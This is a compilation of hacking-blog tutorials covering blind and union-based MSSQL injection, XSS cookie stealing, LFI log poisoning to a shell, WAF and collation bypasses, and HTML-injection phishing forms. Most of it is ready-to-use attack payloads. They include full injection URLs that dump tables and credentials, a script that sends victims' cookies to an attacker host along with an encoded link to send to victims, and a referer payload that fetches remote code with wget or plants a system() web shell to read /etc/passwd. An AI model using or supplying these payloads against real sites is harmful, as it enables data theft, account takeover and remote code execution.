Mssql Blind Sql Injection Tutorial Step By Step !

Mssql Blind Sql Injection Tutorial Step By Step

In this tutorial you will learn how to perform and exploit Blind Mssql SQL Injection manually step by step.So,

What is Blind Mssql SQL Injection ?

Blind SQL (Structured Query Language) injection is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response. This attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection.

In some case, Using normal sql injection is not work. Blind sql injection is another method which may help you. The important point for blind sql injection is the difference between the valid and invalid query result.You have to inject a statement to make query valid or invalid and observe the response.

How To Test Mssql Blind SQL Injection Vulnerable Sites ?

Lets us assume that  http://www.example.com/page.asp?id=1 is normal url of the website. so lets check the vulnerability of website by using true & false conditions like 1=2, 1=1, or 0>1.

http://www.example.com/page.asp?id=1 and 1=1  (True)
http://www.example.com/page.asp?id=1 and 1=2  (False)
http://www.example.com/page.asp?id=1 and 0>1  (False)

If the results from these requests are different, it will be a good signal for you. That Means the Website is vulnerable to blind mssql Sql injection. When you put “id=1 and 1=1“, It means that the condition is true so, the response must be normal. But the parameter “id=1 and 1=2″ indicates that the condition is false and if the webmaster does not provide a proper filter, the response absolutely differs from previous.

Extracting data through Blind Mssql SQL Injection

By using blind mssql sql injection you can extract database but you have to spend more time on that. You will get only one character of the word by executing the some queries.

Let me explain you an example of querying the first character of database name. We assume that database name is member. Therefore, the first character is “m” which the ascii value is 109. (At this point, we assume that you know ascii code).

Ok, first, we have to know that the results from requests have only 2 forms.

The following steps are up to each person. You idea may be different from our idea in order to pick ascii code to test query.

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90

In this situation, the result will be valid query result like http://www.example.com/page.asp?id=1 and 1=1 (because the first character of database name is “m” which ascii code is 109). Then, we try

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>120

It is surely that the result will like http://www.example.com/page.asp?id=1 and 1=2 (because 109 absolutely less than 120).
then, we will try,

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>105

The result is a valid query result and at this point, the ascii value of first character of database name is between 105 and 120.
So, we try

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>112 ===> invalid query result
 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>108 ===> valid query result
 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>110 ===> invalid query result
 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>109 ===> invalid query result

You see that the first character of database name has an ascii value which is greater than 108
but is not greater than 109. Thus, we can conclude that the ascii value is equal to 109.

You can prove with:

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)=109

We sure that the result is like the result of http://www.target.com/page.php?id=1 and 1=1

The rest which you have to do is to manipulate some queries to collect your preferred information.
In this tutorial, we propose some example queries in order to find the names of tables and columns in the database.

Extracting table names through Blind Mssql SQL Injection

In order to get table name, we can use above method to obtain each character of table name.The only thing that we have to do is to change query to retrieve table name of current database. As MSSQL does not have limit command. Therefore, the query is a bit complicated.

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name) 
 FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55))
 AS varchar(8000)),1,1)),0)>97

The above query is used to determine the first character of first table in current database. If we want to find second character of first table,we can do by following request:

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55)) AS varchar(8000)),2,1)),0)>97

We change the second parameter of substring function from 1 to 2 in order to specify preferred position of character in table name.
Thus, if we want to determine other positions, we require only changing second parameter of substring function.

In case of other tables, we can find other table names by changing the second select
from “SELECT TOP 1” to be “SELECT TOP 2” , “SELECT TOP 3” and so on. for example,

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 2 LOWER(name) FROM sysObjects WHERE xtYpe=0x55)) AS varchar(8000)),1,1)),0)=97

Extracting column names through Blind Mssql SQL Injection

After we obtain table names, the next target information is absolutely column names.

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM syscolumns i HERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=1))AS varchar(8000)),1,1)),0)>97

In order to circumvent from magic quote filtering, you have to change ‘tablename’ to be the form of concatenating char() command. for example, if table name is ‘user’, when we put ‘user’ in the query, ‘ may be filtered and our query will be wrong. The solution is convert ‘user’ to be char(117)+char(115)+char(101)+char(114). So, the query in where cluase changes from “Where name=’user'” to “Where name=char(117)+char(115)+char(101)+char(114)”.

Read more: Union Based Mssql Injection Manually Step by Step
In this case, we can circumvent magic quote filtering. The result from the above request is the first character of the first column name of specific table.
When we want to find the second character of the first column, we can use the same method as getting table name, by changing the second parameter of
substring function.

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM 
 syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE 
 id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=1))AS varchar(8000)),2,1)),0)>97

The above request is used to determine the second character of the first column name in specific table.
In case of determining other columns, we can do by changing p.x value from 1 to 2,3,4 and so on. such as,

http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM 
 syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE 
 id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=2))AS varchar(8000)),1,1)),0)>97

The first character of the second column name in specific table can be determined by the above request.

 

Cookie Stealing From Cross Site Scripting ( xss ) Attack

Cookie Stealing From Cross Site Scripting (xss ) Attack

Hello Guys, In this post I will show you Cookie Stealing From Cross Site Scripting ( xss ) Attack. How Attacker can steal cookie from users ?. So I hope you are familiar with xss If not then please read our basic xss tutorial.

Pre-requisite :

  • A Cookie Stealer Code : Get It From Here
  • A Free Web Hosting.
  • Basic Knowledge About XSS Attack.

Cookie stealing is the process in which and attacker exploit the xss vulnerability and steal the cookie from the victim who visit the infected link. These cookie will be used to compromise their accounts.

Creating PHP Cookie Stealer

 

  • Copy the cookie stealer code from here.
  • Open the notepad or any editor and paste the code.
  • Save the file with .php extension. Ex:- xss.php

Now create New file and save it as log.txt (leave it as blank). Don’t change the name , this is the file name what we give in php file.
Now we have Two Files : 1) xss.php 
                                      2) log.txt

Hosting Cookie Stealer and Log file

Now we have to host both the files for hosting files you can use free web hosting or you can do secure tunelling. After hosting domain the stealer will be at : www.domain.com/xss.php

Cookie Stealing From Cross Site Scripting ( xss ) Attack

Now, we have set everything now we have to find vulnerable website to exploit to inject our malicious code.

<script>location.href = ‘http://www.site.com/xss.php?cookie=’+document.cookie;</script>

Cookie Stealing with Stored vs Reflected XSS:

Stored: if you inject this code in Persistent XSS vulnerable site, it will be there forever until admin find it.  It will be shown to all users.  So attackers don’t need to send any link to others.  Whoever visit the page, they will be vicim.

Reflected: In case of Non-persistent attack, attacker will send the link to victims. Whenever they follow the link, it will steal the cookie.  Most of sites are vulnerable to Reflected XSS .

In Reflected, Attackers will send the injected link victims.
For example:
hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = ‘http://www.Yoursite.com/Stealer.php?cookie=’+document.cookie;</script>

The above link is clearly shows the script. Attacker can encode this script in url encoding and and make short the link with url shortening service like tiny url and then send to victim.

http://www.Site.com/index.php?search=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e

Once the victim Open the link, his/her cookie will be stored in log.txt file.

 

MSSQL Union Based Injection Step By Step

MSSQL Union Based Injection Step By Step

Today I am going to show you MSSQL Union Based Injection Step By Step. In this post I will only cover from basics. I don’t see a lot of detailed tutorials on the Internet so I am going to do what I can to help out based on my experience with MS SQL Injections. first of all we need to know the basics of injecting, all the basics including finding the type of injection, database testing and finding the columns etc are same to other databases so i ll suggest you to read the basics before you start here if you don’t read them yet.

so, lets start 😀 ………..

  • So the checking part is same as MySQL first putting single quote and then putting double quote checking the error and i came to know this one is single quote based injection.
www.site.com/?id=1%27 [ Error ]
www.site.com/?id=1%22 [ Error ]

RememberWhen both Single quote and double Quotes gives error then there are high probablities that the injection type is integer based because Single quote based then double quote do not give error and when the injection is double quote based then single quote do not give error, and when both single quote and double quotes give error then apply the golden rule that the injection is integer type.

  • Now lets break and fix the query
    www.site.com/?id=1 -- - [ Working Fine ]
    www.site.com/?id=1 order by 5-- - [ Working Fine ]
    www.site.com/?id=1 order by 6-- - [ Error ]

    That means total number of columns are 5.

  • Now we can continue with order by and in the end we come to know that 5 is the last working column. Now the next part is using using the union select query.
www.site.com/?id=1 and false UnIoN SeLeCt 1,2,3,4,5-- -
MSSQL Union Based Injection Step By Step

If you get this error then in such cases we have an option to use null.

www.site.com/?id=1 and false UnIoN SeLeCt null,null,null,null,null-- -
  • so now we have to use have to convert each column one by one to @@version or db_name() that you will see in video how I did ;).
  • Now when we will put @@version in the column and if the column is vulnerable then it shows version something like this..
    MSSQL Union Based Injection Step By Step

There are some other ways also to collect some more information from MSSQL which are given here:

  1. @@version – Gives version
  2. db_name() – Gives the name of database()
  3. user,system_user,current_user,user_name – Gives the current user.
  4. @@SERVERNAME – Gives the info. about Hostname.
  • Now we will extract the table names, here the syntax is a little bit different than MySQL of lack of limit clause in MSSQL.
http://site.com/?id=1 and false Union All Select 1,table_name,3,db_name(),5 from (select top 1 table_name from information_schema.tables order by 1) as shit order by 1 desc--
http://site.com/?id=1 and false Union All Select 1,table_name,3,db_name(),5 from (select top 2 table_name from information_schema.tables order by 1) as shit order by 1 desc--
http://site.com/?id=1 and false Union All Select 1,table_name,3,db_name(),5 from (select top 3 table_name from information_schema.tables order by 1) as shit order by 1 desc--
  • In this way Increase the top value. But in video I have shown only diosing site.
  • Now in same manner we can extract the column name. let’s see..
http://site.com/?id=1 and false Union All Select 1,column_name,3,db_name(),5 from (select top 1 column_name from information_schema.columns where table_name='your table name here' order by 1) as shit order by 1 desc--
http://site.com/?id=1 and false Union All Select 1,column_name,3,db_name(),5 from (select top 2 column_name from information_schema.columns where table_name='your table name here' order by 1) as shit order by 1 desc--
  • Now lets dump the data from tables and columns. here for concatenation we can use %2b which is ‘ + ‘ .
http://site.com/?id=1 and false Union All Select 1,username%2b' '%2bpassword,3,db_name(),5 from from table name here --

Now we have done this almost. Now lets come to diosing part.

This dios have been created by my friends Zen and Rummy. By Diosing the site we can make the whole process faster.

How to Dios the Mssql Site:

Dios

;begin declare @x varchar(8000), @y int, @z varchar(50), @a varchar(100) declare @myTbl table (name varchar(8000) not null) SET @y=1 SET @x='Injected by Ahmed :: '%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name) from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @myTbl) select @a=@a %2b column_name%2b' : ' from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @myTbl values(@z) SET @x=@x %2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @y = @y%2b1 end select @x as output into Ahmed1 END--

  • Just remove the union select and fix the query then add dios and execute as shown below for more details see video.
http://site.com/?id=1;begin declare @x varchar(8000), @y int, @z varchar(50), @a varchar(100) declare @myTbl table (name varchar(8000) not null) SET @y=1 SET @x='Injected by Ahmed :: '%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name) from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @myTbl) select @a=@a %2b column_name%2b' : ' from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @myTbl values(@z) SET @x=@x %2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @y = @y%2b1 end select @x as output into Ahmed1 END--
  • It will give error but actually its making the DIOS table so now lets try checking the output under Ahmed1.

MSSQL Union Based Injection Step By Step

  • And here we got compete output at once. Before i finish i ll like to show you some basic errors in MSSQLi.

So here we finish MSSQL Union Based Injection. Keep practicing and learning guys..

Spawning a Shell by LFI Poisoning Log Files

Spawning a Shell by LFI Poisoning Log Files

Welcome Padawan!
A while ago, a friend sent me a link to a challenge, I found one of the pages vulnerable to SQL Injection, I injected it, extracted the Admin’s Credentials and as soon as I logged in the “Admin Panel”, I found a page vulnerable to LFI.
So .. I tried /proc/self/environ, finding a phpinfo() page, data://, php://input and things like that but they weren’t working/there. 🙁 ..

The only thing I didn’t try was LFI Log File Poisoning but It was time to unchain the beast ..
I included the “Apache HTTP Configuration file” and looked for the error/access log. Interestingly, instead of finding a .log file, I found a piped bash script ..

Spawning a Shell by LFI Poisoning Log Files

Me likey 🙂 .. Then, of course, I included the bash script. — This was it’s contents ..

#!/bin/bash

DATE=`date +%Y-%m-%d`

while : ; do
 read line
 [ -z "$line" ] && exit

 DOMAIN=""
 if [[ "$line" =~ \[host:([^\]]+) ]]; then
 DOMAIN=${BASH_REMATCH[1]}
 fi
 
 if [ -n "$DOMAIN" ]; then
 echo "${line//\[host:${DOMAIN}\] /}" >> "/var/www/html/$DOMAIN/logs/error_${DATE}.log"
 chown apache:apache /var/www/html/$DOMAIN/logs/error_${DATE}.log
 else
 echo "${line}" >> /var/www/html/error_${DATE}.log
 chown apache:apache /var/www/html/error_${DATE}.log
 fi
done

What does this do? It creates a .log file in “/var/www/html/domain.tld/logs/” with the name “error_YYYY-MM-DD” & According to the Apache Config, It sent URL, Referer and time to this bash script which then saved it to the file .. So, I just had to visit a non-existent page *to get a 404* with my referer set to “<?php system(‘wget http://x.com/y.txt -O z.php’); ?>” or any of it’s equivalents .. and then include the .log file to execute the code 😉

curl -e “<?php system($_POST[‘x’]) ?>” http://domain.tld/blablabla.ext

Spawning a Shell by LFI Poisoning Log Files

curl –data “x=cat /etc/passwd” http://domain.tld/admin/lfi.php?param=../../../../../../../../var/www/html/domain.tld/logs/error_YYYY-MM-DD.log

Spawning a Shell by LFI Poisoning Log Files

I guess we’re done here 😀

ps: after solving the challenge I found out the “official solution” was nothing like this, it was a simple imagecreatefromXYZ() bypass. 😛
You had to upload an image-encoded shell to sucessfully bypass that function + other image re-sizing functions .. there are various great articles written on that topic here are some of them ..

Bypass illegal mix of collations in sql injection

Bypass illegal mix of collations in sql injection

In this post you will learn how you can bypass the error illegal mix of collations in sql injection.

what is illegal mix of collation ?

Collation refers to a set of rules that determine how data is sorted and compared. Character data is sorted using rules that define the correct character sequence, with options for specifying case-sensitivity, accent marks, character types and character width.

Collation is concerned with how character data is interpreted by SQL Server. Because many people use MySQL with data to be stored in languages other than English, they need to select the rules of comparisons which in turn depends on the character set used for storing that data.

In MySQL, data is stored using a specific character set, which can be defind at different levels; i.e., the sever, the database, the table, and the column levels.

With union select we are combining result-set of two or more select statements. We already know that each SELECT statement within the UNION must have the same number of columns. The columns must also have similar data types. And they must have same collation !! If they are different we get an error.

Bypassing Error

# Method 1

Define COLLATE
SELECT * FROM table ORDER BY somekey COLLATE latin1_general_ci;

We can use different collation names:
latin1_general_ci
utf8_general_ci
utf8_unicode_ci
latin1_german1_ci
latin1_swedish_ci

A name ending in _ci indicates a case-insensitive collation.
A name ending in _cs indicates a case-sensitive collation.
A name ending in _bin indicates a binary collation. Character comparisons are based on character binary code values

# Method 2

By using function CONVERT
CONVERT() provides a way to convert data between different character sets. The syntax is: CONVERT(expr USING transcoding_name).
http://vuln-web.com/?id=1 and 0 UNION SELECT,convert(version() using binary),3,4,5,6,7,8--

# Method 3

Use function CAST

you can also use CAST() to convert a string to a different character set. The syntax is: CAST(character_string AS character_data_type CHARACTER SET charset_name).

http://vuln-web.com/?id=1 and 0 UNION SELECT 1,cast(version()as binary),3,4,5,6,7,8--
Read More: Inject a site when commas are block

# Method 4

Use function UNHEX(HEX(xx))
UNHEX() –> Return a string containing hex representation
HEX() –> Return a hexadecimal representation of a decimal or string value

http://vuln-web.com/?id=1 and 0 UNION SELECT 1,UNHEX(HEX(version())),3,4,5,6,7,8--

Hope, this will help you in illegal mix of collation error. Keep learning and practising.

Thanks for reading guys. 🙂

Sql Injection – Inject A Site When Commas Are Blocked

Inject A Site When Commas Are Blocked

In this tutorial I will show you how to Inject a site when commas are blocked. Injecting a site when commas are blocked is too easy.

There are many methods to bypass commas in sql injection.

# Method 1

By putting , in comment like

union select 1/*!,*/ 2/*!,*/ 3

OR

union select 1/*,*/ 2/*,*/ 3

# Method 2

We can use CHAR(44). CHAR value is the Ascii value of Comma. After regular commas are strip out by WAF those as CHAR may remains.

union select 1,CHAR(44), 2,CHAR(44), 3

# Method 3

We can use command join.

(select 1)a join (select 2)b join (select 3)c

# Method 4

Escaped-encoding/URL encoding (or sometimes referred to as percent-encoding) is a method of representing characters within an URL that may need special syntax handling to be correctly interpreted. This is achieved by encoding the character to be interpreted with a sequence of three characters. It consists of the percentage character % followed by the two hexadecimal digits representing the octet code of the original character. For example, the US-ASCII character set represents a comma with octet code 44, or hexadecimal 2C. Thus its URL-encoded representation is %2C.

union select 1%2C 2%2C 3

# Method 5

we can replace the comma with %82.

union select 1%82 2%82 3

# Method 6

Sometimes this basic URL-encoding attack might not work, however you can circumvent the WAF by double URL-encoding the blocked character(s). In the double-encoded attack the % character in the original command is itself URL-encoded in the normal way (as %25) so that the double-URL-encoded value of comma (%2C) is %252C.

union select 1%252C 2%252C 3

Thanks for reading guys. Now my next tutorial will be on bypassing white spaces. keep sharing and learning 🙂

HTML Injection Step by Step For Begineers

HTML Injection Step by Step For Begineers

Hello guys, hope you were doing good and practising so today in this post we will discuss about HTML injection and why HTML injection is risky.

What is HTML injection ?
HTML Injection, Hyper Text Markup Language Injection is a vulnerability which allows an attacker to inject a malicious script via specific parameter. Also HTML Injection is referred as a virtual defacement of web application.

The possible attveack scenario are demonstrated below

  1. An attacker can find a vulnerability and perform HTML injection vulnerability.
  2. An attacker can do phishing from the vulnerable website and send email to victim.
  3. The user visits the page due to the trust worthy domain and can Enter User Id and password which is sent to attacker server.

So lets start ..

  1. Firstly you need to find a website which is vulnerable to HTML Injection. Here I am using bWAPP lab.
  2. Here I have opened the page which is vulnerable to HTML injection. Just add your HTML code as shown below.

Html injection

3. As you can see I add my simple <h1> ahmed </h1> code and executed. this code is executed.

4. Now lets try with some html More html tag such as bold, colour, background e.t.c.

Html injection

See the above image i have modified its look using some basic tags. You can also perform XSS attack using HTML Injection as shown in below image.

Html injection

So let’s try to create a login form using this code.

<form action=”http://127.0.0.1/login.php” method=”POST”>
Username: <input type=”text” name=”username”><br>
Password: <input type=”password” name=”pass”><br>
<input type=”submit” value=”Login”></form>

Make your any page or you can add you deface page change this code and and change you location.

<form action=”http://127.0.0.1/login.php” method=”POST”>

 

Html injection

Just login with any username and password and see what happens.

Html injection

This page is shown after login of victim 🙁 and we got successfully ID and Password.

Keep Learning.. and Injecting but don’t harm an site.